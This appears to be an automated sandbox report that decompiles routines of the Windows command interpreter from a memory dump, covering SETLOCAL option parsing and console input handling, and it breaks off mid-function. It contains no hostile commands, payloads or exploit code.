                                  0x0016baff
                                  0x0016bb01
                                  0x0016bb03
                                  0x0016bb08
                                  0x0016bb0e
                                  0x0016bb10
                                  0x0016bb15
                                  0x0016bb18
                                  0x0016bb58
                                  0x0016bb58
                                  0x0016bb5f
                                  0x0016bb7c
                                  0x00000000
                                  0x0016bb1a
                                  0x0016bb1a
                                  0x0016bb1c
                                  0x00000000
                                  0x0016bb1c
                                  0x0015db32
                                  0x0015db32
                                  0x0015db32
                                  0x0015db34
                                  0x00000000
                                  0x0015db3a
                                  0x0015db3a
                                  0x0015db40
                                  0x00000000
                                  0x0015db40
                                  0x0015db34
                                  0x0015db2c
                                  0x0015db24
                                  0x0015dafe
                                  0x0015daf6
                                  0x0015dae2
                                  0x0015dad0
                                  0x0015dac1
                                  0x0015daaf
                                  0x00000000
                                  0x0015db43
                                  0x0015db43
                                  0x0015db46
                                  0x0015db48
                                  0x0015db48
                                  0x0015da9b
                                  0x0015da92
                                  0x0015da74
                                  0x0015db50
                                  0x0015db53
                                  0x0015db59
                                  0x0015db5a
                                  0x0015db5d
                                  0x0015db5f
                                  0x0015db60
                                  0x0015db61
                                  0x0015db61
                                  0x0015db63
                                  0x0015db64
                                  0x0015db69
                                  0x0015db6b
                                  0x0015db6c
                                  0x00000000
                                  0x0015db6c
                                  0x0015d8f2
                                  0x0015d8f2
                                  0x0015d8f8
                                  0x0015d8fb
                                  0x0015d8fe
                                  0x0015d905
                                  0x0015d906
                                  0x0015d90b
                                  0x0015d90e
                                  0x0015d910
                                  0x0015d912
                                  0x0015d912
                                  0x00000000
                                  0x0015d910
                                  0x0015d8cc
                                  0x0015d8ce
                                  0x0015d8d0
                                  0x0015d8d0
                                  0x0015d8d2
                                  0x00000000
                                  0x0015d8d2
                                  0x0015d8ca
                                  0x0015d8ac
                                  0x00160502
                                  0x0016050c
                                  0x00160512
                                  0x00160515
                                  0x00160517
                                  0x00000000
                                  0x0016051d
                                  0x00160527
                                  0x0016052d
                                  0x00160530
                                  0x00160532
                                  0x00160551
                                  0x00160551
                                  0x0015de5e
                                  0x0015de60
                                  0x0015de66
                                  0x0015de67
                                  0x0015de68
                                  0x0015de6a
                                  0x0016bca8
                                  0x0016bcaa
                                  0x0016bcac
                                  0x0016bcb2
                                  0x0016bcb2
                                  0x0015de72
                                  0x0015de78
                                  0x0015de7a
                                  0x0015de7c
                                  0x0016bcba
                                  0x0016bcbb
                                  0x0016bcc3
                                  0x0016bcc4
                                  0x0016bcca
                                  0x0016bccc
                                  0x0015de82
                                  0x0015de82
                                  0x0015de82
                                  0x0015de84
                                  0x0015de84
                                  0x0015de8b
                                  0x0015de8c
                                  0x0015de91
                                  0x0015de93
                                  0x0016bcd7
                                  0x0016bcdb
                                  0x00000000
                                  0x0015de99
                                  0x0015de9b
                                  0x0015de9d
                                  0x0015de9f
                                  0x0015dea4
                                  0x0015dea9
                                  0x0015deab
                                  0x0015dee6
                                  0x0015dee6
                                  0x0015dee7
                                  0x0015dee9
                                  0x0015deea
                                  0x0015deeb
                                  0x0015dead
                                  0x0015deaf
                                  0x0015deb0
                                  0x0015deb5
                                  0x0015deba
                                  0x0015deee
                                  0x0015def0
                                  0x0015def2
                                  0x00000000
                                  0x0015debc
                                  0x0015debc
                                  0x0015dec1
                                  0x0015dec4
                                  0x0015dec9
                                  0x0015decb
                                  0x0016bce6
                                  0x0016bcf2
                                  0x0016bcf8
                                  0x0016bcf9
                                  0x0016bcfb
                                  0x0016bd01
                                  0x0016bd03
                                  0x0016bd03
                                  0x0015dfb0
                                  0x0015dfb1
                                  0x0015dfb2
                                  0x0015dfb4
                                  0x0015dfb5
                                  0x0015ded1
                                  0x0015ded1
                                  0x0015ded7
                                  0x0015dede
                                  0x0015dee1
                                  0x00000000
                                  0x0015dee1
                                  0x0015decb
                                  0x0015deba
                                  0x0015deab
                                  0x00160534
                                  0x0016053e
                                  0x00160544
                                  0x00160547
                                  0x00160549
                                  0x00000000
                                  0x0016054b
                                  0x0016054b
                                  0x0015ed82
                                  0x0015ed83
                                  0x0015ed85
                                  0x0015ed88
                                  0x0015ed89
                                  0x0015ed8a
                                  0x0015ed8d
                                  0x0015ed94
                                  0x0015ed95
                                  0x0015ed95
                                  0x0015ed97
                                  0x0015ed9f
                                  0x0015eda1
                                  0x0015eda4
                                  0x0015eda4
                                  0x0015eda9
                                  0x0015edab
                                  0x00000000
                                  0x00000000
                                  0x0015edad
                                  0x0015edb2
                                  0x0015edb7
                                  0x0015edbc
                                  0x0015ede9
                                  0x0015edec
                                  0x0015edf2
                                  0x0015edf4
                                  0x0016c0ad
                                  0x0016c0b0
                                  0x0016c0b0
                                  0x0016c0b3
                                  0x0016c0b6
                                  0x0016c0b6
                                  0x0016c0bb
                                  0x0016c0bf
                                  0x0016c0bf
                                  0x0015edfa
                                  0x0015ee02
                                  0x0015ee04
                                  0x0015ee07
                                  0x0015ee09
                                  0x0016c0f7
                                  0x0016c103
                                  0x0016c109
                                  0x0016c10a
                                  0x0016c111
                                  0x0016c117
                                  0x0016c117
                                  0x0015efe1
                                  0x0015efe1
                                  0x0015efe3
                                  0x0015efea
                                  0x0015efef
                                  0x0016c121
                                  0x0016c123
                                  0x0016c125
                                  0x0016c125
                                  0x0015eff5
                                  0x0015eff7
                                  0x0015eff8
                                  0x0015eff9
                                  0x0015effa
                                  0x0015effb
                                  0x0015ee0f
                                  0x0015ee0f
                                  0x0015ee12
                                  0x0015ee14
                                  0x0016c0c7
                                  0x0016c0c9
                                  0x0016c0cb
                                  0x0016c0cb
                                  0x0015ee1a
                                  0x0015ee1c
                                  0x0015ee1e
                                  0x0016c0d5
                                  0x0016c0d5
                                  0x0015ee24
                                  0x0015ee24
                                  0x0015ee2a
                                  0x00000000
                                  0x00000000
                                  0x0015ee2a
                                  0x0015ee30
                                  0x0015ee32
                                  0x0016c0f0
                                  0x0016c0f0
                                  0x0015ee38
                                  0x0015ee38
                                  0x0015ee3a
                                  0x0015ee3c
                                  0x0015ee3e
                                  0x0015ee40
                                  0x0016c0eb
                                  0x0016c0eb
                                  0x00000000
                                  0x0015ee46
                                  0x0015ee46
                                  0x0015ee46
                                  0x0015ee49
                                  0x00000000
                                  0x00000000
                                  0x0016c0df
                                  0x0016c0e2
                                  0x0016c0e2
                                  0x0016c0e5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016c0e5
                                  0x0015ee4f
                                  0x0015ee51
                                  0x00000000
                                  0x0015ee57
                                  0x0015ee57
                                  0x0015ee59
                                  0x0015ee59
                                  0x0015ee59
                                  0x0015ee51
                                  0x0015ee40
                                  0x0015ee5b
                                  0x0015ee5b
                                  0x0015ee5d
                                  0x0015ee5f
                                  0x0015ee62
                                  0x0015ee64
                                  0x0015ee67
                                  0x0015ee67
                                  0x0015ee69
                                  0x0015ee99
                                  0x0015ee99
                                  0x0015ee6b
                                  0x0015ee6b
                                  0x0015ee6d
                                  0x0015ee73
                                  0x0015ee75
                                  0x0015ee7a
                                  0x0015ee7c
                                  0x0015ee7c
                                  0x0015ee80
                                  0x0015ee80
                                  0x0015ee82
                                  0x00000000
                                  0x00000000
                                  0x0015ee84
                                  0x0015ee88
                                  0x0015ee8b
                                  0x00000000
                                  0x0015ee8d
                                  0x0015ee8d
                                  0x0015ee90
                                  0x0015ee91
                                  0x0015ee94
                                  0x0015ee94
                                  0x0015ee97
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015ee97
                                  0x00000000
                                  0x0015ee8b
                                  0x0015ee9e
                                  0x0015eea0
                                  0x00000000
                                  0x00000000
                                  0x0015eea0
                                  0x0015eea2
                                  0x0015eea2
                                  0x0015eea5
                                  0x0015eea5
                                  0x0015eea7
                                  0x0015eea7
                                  0x0015eeaa
                                  0x00000000
                                  0x0015eeaa
                                  0x0015edbe
                                  0x0015edbe
                                  0x0015edc1
                                  0x0015edc3
                                  0x0015edc8
                                  0x0015edca
                                  0x0015eeb2
                                  0x0015eeb4
                                  0x0015eeb4
                                  0x0015eeb4
                                  0x0015eeb7
                                  0x0015eeb9
                                  0x0015eebc
                                  0x0015eebc
                                  0x0015eec0
                                  0x00000000
                                  0x0015edd0
                                  0x0015edd1
                                  0x0015edd3
                                  0x0015edd3
                                  0x0015edd5
                                  0x00000000
                                  0x0015edd5
                                  0x0015edca
                                  0x00000000
                                  0x0015edbc
                                  0x0015edda
                                  0x0015eddd
                                  0x0015edde
                                  0x0015ede1
                                  0x0015ede3
                                  0x0015ede4
                                  0x0015ede5
                                  0x0015ede7
                                  0x0015ede8
                                  0x0015ede8
                                  0x00160549
                                  0x00160532
                                  0x00160517
                                  0x001604fc
                                  0x001604e1
                                  0x001604c6
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmp
                                  • String ID: FOR$FOR/?$IF/?$REM$REM/?
                                  • API String ID: 2081463915-3874590324
                                  • Opcode ID: 92156b4ffcc17c5ce28da0ad6d255ede4bba84cfa6fac1023ede97faa428b2a2
                                  • Instruction ID: 271c85a0add5a40c4dfa688bb55b1fefd0051060c6feb9cdea495b4d1a825467
                                  • Opcode Fuzzy Hash: 92156b4ffcc17c5ce28da0ad6d255ede4bba84cfa6fac1023ede97faa428b2a2
                                  • Instruction Fuzzy Hash: E131B831740201C6DF2A7B78BC5636B2290AB04756F04803EE957DA6D0DFB18AEECB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017474C, Relevance: 18.2, APIs: 12, Instructions: 203COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0017474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v2060;
				char _v2061;
				char _v2062;
				signed int _v2068;
				long _v2072;
				long _v2076;
				void* _v2080;
				intOrPtr _v2088;
				signed int _t36;
				long* _t38;
				void* _t40;
				signed int _t43;
				long _t44;
				wchar_t* _t45;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t58;
				signed int _t60;
				void* _t61;
				intOrPtr _t63;
				wchar_t* _t70;
				long _t71;
				wchar_t* _t72;
				wchar_t* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t89;
				void* _t102;
				long _t103;
				wchar_t* _t104;
				void* _t106;
				wchar_t* _t107;
				signed int _t108;

				_t99 = __edx;
				_t36 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t36 ^ _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v2061 = 0;
				_v2062 = 0;
				_t38 = E0015DF40(__ecx);
				if(_t38 == 0) {
					L3:
					_t40 = 1;
					goto L4;
				} else {
					_t82 = _t38;
					_t107 = E00162430(_t38);
					_t43 =  *_t107 & 0x0000ffff;
					if(_t43 != 0) {
						_t103 = 0x22;
						if(_t43 == _t103) {
							_t5 =  &(_t107[0]); // 0x2
							_t107 = E00162430(_t5);
							_t74 = wcsrchr(_t107, _t103);
							if(_t74 != 0) {
								 *_t74 = 0;
							}
						}
						_t44 = 0x3d;
						_t45 = wcschr(_t107, _t44);
						_pop(_t82);
						if(_t45 == 0) {
							goto L2;
						} else {
							 *_t45 = 0;
							_t6 =  &(_t45[0]); // 0x2
							_t82 = _t6;
							_t104 = E00162430(_t6);
							_t48 = 0x22;
							if( *_t104 == _t48) {
								_t7 =  &(_t104[0]); // 0x2
								_t70 = E00162430(_t7);
								_t104 = _t70;
								_t71 = 0x22;
								_t72 = wcsrchr(_t104, _t71);
								_pop(_t82);
								if(_t72 != 0) {
									_t82 = 0;
									 *_t72 = 0;
								}
							}
							_t49 = 0x3d;
							if( *_t104 == _t49) {
								goto L2;
							} else {
								_t78 = GetStdHandle(0xfffffff5);
								if(GetConsoleMode(_t78,  &_v2072) != 0) {
									_v2061 = 1;
									SetConsoleMode(_t78, _v2072 | 0x00000001);
								}
								_t53 = GetStdHandle(0xfffffff6);
								_t87 =  &_v2076;
								_v2080 = _t53;
								if(GetConsoleMode(_t53,  &_v2076) != 0) {
									_t87 = _v2076 | 0x00000007;
									_v2062 = 1;
									SetConsoleMode(_v2080, _v2076 | 0x00000007);
								}
								E0015C108(_t87, 0x2371, 1, _t104);
								_v2060 = 0;
								_t58 = GetStdHandle(0xfffffff6);
								_t99 =  &_v2060;
								_t88 = _t58;
								if(E00173B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
									L23:
									_t60 = 0;
									_v2068 = 0;
								} else {
									_t60 = _v2068;
									if(_t60 == 0) {
										goto L23;
									} else {
										_t88 = _t108 + _t60 * 2 - 0x80a;
										while( *_t88 < 0x20) {
											_t60 = _t60 - 1;
											_t88 = _t88 - 2;
											_v2068 = _t60;
											if(_t60 != 0) {
												continue;
											} else {
											}
											goto L24;
										}
									}
								}
								L24:
								if(_v2061 != 0) {
									SetConsoleMode(_t78, _v2072);
									_t60 = _v2068;
								}
								if(_v2062 != 0) {
									SetConsoleMode(_v2080, _v2076);
									_t60 = _v2068;
								}
								if(_t60 == 0) {
									goto L3;
								} else {
									_t61 = _t60 + _t60;
									if(_t61 >= 0x800) {
										E0016711D(_t61, _t78, _t88, _t99, _t104, _t107);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t108);
										_t89 = _v2088;
										if( *0x17d5fc == 2) {
											_t63 = E001746A5(_t89, 0);
											L35:
											 *0x18b8b0 = _t63;
											return _t63;
										}
										_t63 = E001746A5(_t89, 0);
										if(_t63 != 0) {
											goto L35;
										}
										return _t63;
									} else {
										_t99 =  &_v2060;
										 *((short*)(_t108 + _t61 - 0x808)) = 0;
										_t40 = E00163A50(_t107,  &_v2060);
										L4:
										_pop(_t102);
										_pop(_t106);
										_pop(_t77);
										return E00166FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
									}
								}
							}
						}
					} else {
						L2:
						_push(0);
						_push(0x232a);
						E0015C5A2(_t82);
						goto L3;
					}
				}
			}






































                                  0x0017474c
                                  0x00174757
                                  0x0017475e
                                  0x00174761
                                  0x00174762
                                  0x00174765
                                  0x00174766
                                  0x0017476c
                                  0x00174772
                                  0x00174779
                                  0x00174799
                                  0x0017479b
                                  0x00000000
                                  0x0017477b
                                  0x0017477b
                                  0x00174782
                                  0x00174784
                                  0x0017478a
                                  0x001747af
                                  0x001747b3
                                  0x001747b5
                                  0x001747bd
                                  0x001747c1
                                  0x001747cb
                                  0x001747cf
                                  0x001747cf
                                  0x001747cb
                                  0x001747d4
                                  0x001747d7
                                  0x001747de
                                  0x001747e1
                                  0x00000000
                                  0x001747e3
                                  0x001747e5
                                  0x001747e8
                                  0x001747e8
                                  0x001747f0
                                  0x001747f4
                                  0x001747f8
                                  0x001747fa
                                  0x001747fd
                                  0x00174804
                                  0x00174806
                                  0x00174809
                                  0x00174810
                                  0x00174813
                                  0x00174815
                                  0x00174817
                                  0x00174817
                                  0x00174813
                                  0x0017481c
                                  0x00174820
                                  0x00000000
                                  0x00174826
                                  0x0017482e
                                  0x00174840
                                  0x0017484b
                                  0x00174854
                                  0x00174854
                                  0x0017485c
                                  0x00174862
                                  0x00174868
                                  0x00174878
                                  0x00174880
                                  0x00174883
                                  0x00174891
                                  0x00174891
                                  0x0017489f
                                  0x001748a9
                                  0x001748be
                                  0x001748c4
                                  0x001748ca
                                  0x001748d3
                                  0x001748fc
                                  0x001748fc
                                  0x001748fe
                                  0x001748d5
                                  0x001748d5
                                  0x001748dd
                                  0x00000000
                                  0x001748df
                                  0x001748df
                                  0x001748e6
                                  0x001748ec
                                  0x001748ed
                                  0x001748f0
                                  0x001748f8
                                  0x00000000
                                  0x00000000
                                  0x001748fa
                                  0x00000000
                                  0x001748f8
                                  0x001748e6
                                  0x001748dd
                                  0x00174904
                                  0x0017490b
                                  0x00174914
                                  0x0017491a
                                  0x0017491a
                                  0x00174927
                                  0x00174935
                                  0x0017493b
                                  0x0017493b
                                  0x00174943
                                  0x00000000
                                  0x00174949
                                  0x00174949
                                  0x00174950
                                  0x0017496e
                                  0x00174973
                                  0x00174974
                                  0x00174975
                                  0x00174976
                                  0x00174977
                                  0x00174978
                                  0x00174979
                                  0x0017497a
                                  0x0017497b
                                  0x0017497c
                                  0x0017497d
                                  0x0017497e
                                  0x0017497f
                                  0x00174982
                                  0x00174985
                                  0x00174991
                                  0x0017499e
                                  0x001749a3
                                  0x001749a3
                                  0x00000000
                                  0x001749a3
                                  0x00174993
                                  0x0017499a
                                  0x00000000
                                  0x0017499c
                                  0x001749a9
                                  0x00174952
                                  0x00174954
                                  0x0017495a
                                  0x00174964
                                  0x0017479c
                                  0x0017479f
                                  0x001747a0
                                  0x001747a3
                                  0x001747ac
                                  0x001747ac
                                  0x00174950
                                  0x00174943
                                  0x00174820
                                  0x0017478c
                                  0x0017478c
                                  0x0017478c
                                  0x0017478d
                                  0x00174792
                                  0x00000000
                                  0x00174798
                                  0x0017478a

                                  APIs
                                    • Part of subcall function 00162430: iswspace.MSVCRT ref: 00162440
                                  • wcsrchr.MSVCRT ref: 001747C1
                                  • wcschr.MSVCRT ref: 001747D7
                                  • wcsrchr.MSVCRT ref: 00174809
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00174828
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00174838
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00174854
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0017485C
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00174870
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00174891
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 001748BE
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00174914
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00174935
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                  • String ID:
                                  • API String ID: 4166807220-0
                                  • Opcode ID: c3ae0f1a8bafc1d9f4e790969a8573e2fdcf999cbec694006ab5297dee2a0cdb
                                  • Instruction ID: 9622216e5be8345e4f0e1571f27169cad0034a1e075d55aac07b1209890dc8c6
                                  • Opcode Fuzzy Hash: c3ae0f1a8bafc1d9f4e790969a8573e2fdcf999cbec694006ab5297dee2a0cdb
                                  • Instruction Fuzzy Hash: F451C0716042199BEB24AB78DC49BBA77F8FF05310F14C4AAE499D6190EF708EC5CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015C430, Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E0015C430() {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t21;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t37;
				char _t40;
				void* _t47;
				intOrPtr* _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t65;
				void* _t68;
				void* _t73;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t83;

				_t46 = _t83;
				_push(_t47);
				_push(_t47);
				_v8 =  *((intOrPtr*)(_t83 + 4));
				_t21 =  *0x193cc4;
				if(_t21 == 0) {
					L19:
					_t22 = 0;
				} else {
					if( *((intOrPtr*)(_t21 + 0x14)) >= 0x20) {
						_push(0);
						_push(0x4000271c);
						E0015C5A2(_t47);
						goto L24;
					} else {
						_t50 =  *0x193cb8;
						if(_t50 == 0) {
							_t50 = 0x193ab0;
						}
						_t68 = _t50 + 2;
						do {
							_t25 =  *_t50;
							_t50 = _t50 + 2;
						} while (_t25 != 0);
						_t73 = (_t50 - _t68 >> 1) + 1;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0xc);
						if(_t77 == 0) {
							L24:
							_t22 = 1;
						} else {
							_t53 = HeapAlloc(GetProcessHeap(), 8, _t73 + _t73);
							 *_t77 = _t53;
							if(_t53 == 0) {
								goto L24;
							} else {
								_t31 =  *0x193cb8;
								if( *0x193cb8 == 0) {
									_t31 = 0x193ab0;
								}
								E00161040(_t53, _t73, _t31);
								_t33 = E00163B2C(_t53);
								 *((intOrPtr*)(_t77 + 4)) = _t33;
								if(_t33 == 0) {
									goto L24;
								} else {
									_t54 =  *0x193cc4;
									 *((char*)(_t77 + 8)) =  *0x193cc9;
									 *((char*)(_t77 + 9)) =  *0x193cc8;
									 *((intOrPtr*)(_t54 + 0x90 +  *(_t54 + 0x14) * 4)) = _t77;
									_t37 =  *0x193cd8;
									 *(_t54 + 0x14) =  *(_t54 + 0x14) + 1;
									 *((intOrPtr*)(_t54 + 0xc)) = _t37;
									if( *((intOrPtr*)(_t54 + 0x10)) < _t37) {
										 *((intOrPtr*)(_t54 + 0x10)) = _t37;
									}
									_t78 = E0015EA40( *((intOrPtr*)( *((intOrPtr*)(_t46 + 8)) + 0x3c)), 0, 0);
									_t40 = 0;
									 *0x18b8b0 = 0;
									while( *_t78 != _t40) {
										__imp___wcsicmp(_t78, L"ENABLEEXTENSIONS");
										if(_t40 != 0) {
											__imp___wcsicmp(_t78, L"DISABLEEXTENSIONS");
											if(_t40 == 0) {
												 *0x193cc9 = 0;
												goto L15;
											} else {
												__imp___wcsicmp(_t78, L"ENABLEDELAYEDEXPANSION");
												if(_t40 != 0) {
													__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
													_t65 = _t78;
													if(_t40 != 0) {
														if( *_t78 == 0) {
															goto L15;
														} else {
															_push(0);
															_push(0x400023a6);
															E0015C5A2(_t65);
															_t22 = 1;
															 *0x18b8b0 = 1;
														}
													} else {
														 *0x193cc8 = _t40;
														goto L15;
													}
												} else {
													 *0x193cc8 = 1;
													goto L15;
												}
											}
										} else {
											 *0x193cc9 = 1;
											L15:
											_t78 = E0015D7E6(_t78);
											_t40 = 0;
											continue;
										}
										goto L20;
									}
									goto L19;
								}
							}
						}
					}
				}
				L20:
				return _t22;
			}





















                                  0x0015c433
                                  0x0015c435
                                  0x0015c436
                                  0x0015c441
                                  0x0015c447
                                  0x0015c450
                                  0x0015c58c
                                  0x0015c58c
                                  0x0015c456
                                  0x0015c45a
                                  0x0016a90c
                                  0x0016a90e
                                  0x0016a913
                                  0x00000000
                                  0x0015c460
                                  0x0015c460
                                  0x0015c468
                                  0x0016a902
                                  0x0016a902
                                  0x0015c46e
                                  0x0015c473
                                  0x0015c473
                                  0x0015c476
                                  0x0015c479
                                  0x0015c486
                                  0x0015c496
                                  0x0015c49a
                                  0x0016a91a
                                  0x0016a91c
                                  0x0015c4a0
                                  0x0015c4b3
                                  0x0015c4b5
                                  0x0015c4b9
                                  0x00000000
                                  0x0015c4bf
                                  0x0015c4bf
                                  0x0015c4c6
                                  0x0016a922
                                  0x0016a922
                                  0x0015c4cf
                                  0x0015c4d4
                                  0x0015c4d9
                                  0x0015c4de
                                  0x00000000
                                  0x0015c4e4
                                  0x0015c4e4
                                  0x0015c4ef
                                  0x0015c4f7
                                  0x0015c4fd
                                  0x0015c504
                                  0x0015c509
                                  0x0015c50c
                                  0x0015c512
                                  0x0015c514
                                  0x0015c514
                                  0x0015c527
                                  0x0015c529
                                  0x0015c52b
                                  0x0015c56c
                                  0x0015c577
                                  0x0015c581
                                  0x0015c538
                                  0x0015c542
                                  0x0015c59b
                                  0x00000000
                                  0x0015c544
                                  0x0015c54a
                                  0x0015c554
                                  0x0016a932
                                  0x0016a939
                                  0x0016a93c
                                  0x0016a94d
                                  0x00000000
                                  0x0016a953
                                  0x0016a953
                                  0x0016a954
                                  0x0016a959
                                  0x0016a961
                                  0x0016a963
                                  0x0016a963
                                  0x0016a93e
                                  0x0016a93e
                                  0x00000000
                                  0x0016a93e
                                  0x0015c55a
                                  0x0015c55a
                                  0x00000000
                                  0x0015c55a
                                  0x0015c554
                                  0x0015c583
                                  0x0015c583
                                  0x0015c561
                                  0x0015c568
                                  0x0015c56a
                                  0x00000000
                                  0x0015c56a
                                  0x00000000
                                  0x0015c581
                                  0x00000000
                                  0x0015c56c
                                  0x0015c4de
                                  0x0015c4b9
                                  0x0015c49a
                                  0x0015c45a
                                  0x0015c58e
                                  0x0015c596

                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 0015C489
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0015C490
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 0015C4A6
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0015C4AD
                                  • _wcsicmp.MSVCRT ref: 0015C538
                                  • _wcsicmp.MSVCRT ref: 0015C54A
                                  • _wcsicmp.MSVCRT ref: 0015C577
                                  • _wcsicmp.MSVCRT ref: 0016A932
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap_wcsicmp$AllocProcess
                                  • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                  • API String ID: 435930816-3086019870
                                  • Opcode ID: 41c7e3d7ec3c31847436ab846f311d4fa3de6858c55a7f6eb71f0f3bafd667de
                                  • Instruction ID: 1bbe9609180f0432d5b60d62d5fbf3bc73421271365d7071f0bfe3ae4522d22f
                                  • Opcode Fuzzy Hash: 41c7e3d7ec3c31847436ab846f311d4fa3de6858c55a7f6eb71f0f3bafd667de
                                  • Instruction Fuzzy Hash: AF511531604701DFD718DF78AC0592737E4EB09315724886FEC62EB681EB21EA85CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017A834, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0017A834(intOrPtr __ecx, DWORD* __edx) {
				signed int _v8;
				char _v524;
				int _v532;
				char _v536;
				int _v540;
				void _v1060;
				long _v1068;
				char _v1072;
				int _v1076;
				void _v1596;
				int _v1604;
				char _v1608;
				void* _v1612;
				void _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				signed short _v2142;
				long _v2144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr _t98;
				WCHAR* _t102;
				short* _t104;
				WCHAR* _t105;
				DWORD* _t107;
				signed short _t108;
				DWORD* _t120;
				void* _t131;
				WCHAR* _t133;
				short* _t134;
				WCHAR* _t136;
				short* _t138;
				intOrPtr* _t142;
				signed int _t144;
				DWORD* _t146;
				signed int _t148;

				_t141 = __edx;
				_t65 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t65 ^ _t148;
				_v2136 = __ecx;
				_t146 = 0;
				_v1604 = 0x104;
				_v1612 = 0;
				_t120 = 1;
				_t145 = __edx;
				_v1608 = 1;
				memset( &_v2132, 0, 0x104);
				_v1076 = 0;
				_v1072 = 1;
				_v1068 = 0x104;
				memset( &_v1596, 0, 0x104);
				_v540 = 0;
				_v536 = 1;
				_v532 = 0x104;
				memset( &_v1060, 0, 0x104);
				_t122 =  &_v2132;
				if(E00160C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L46:
					_push(_t146);
					_push(8);
					E0015C5A2(_t122);
					_t146 = _t120;
					L47:
					_t120 = _t146;
					L48:
					_t147 = _t120;
					L49:
					__imp__??_V@YAXPAX@Z(_v540);
					__imp__??_V@YAXPAX@Z(_v1076);
					__imp__??_V@YAXPAX@Z();
					return E00166FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
				}
				_t122 =  &_v1596;
				if(E00160C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				_t122 =  &_v1060;
				if(E00160C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				E00160D89(_t141, _t145);
				_t131 = _v1612;
				_t142 = _t131;
				if(_t131 == 0) {
					_t142 =  &_v2132;
				}
				_t145 = _t142 + 2;
				do {
					_t98 =  *_t142;
					_t142 = _t142 + 2;
				} while (_t98 != _t146);
				_t99 = _v540;
				_t144 = _t142 - _t145 >> 1;
				if(_v540 == 0) {
					_t99 =  &_v1060;
				}
				if(_t131 == 0) {
					_t131 =  &_v2132;
				}
				_t141 = _t144 + 1;
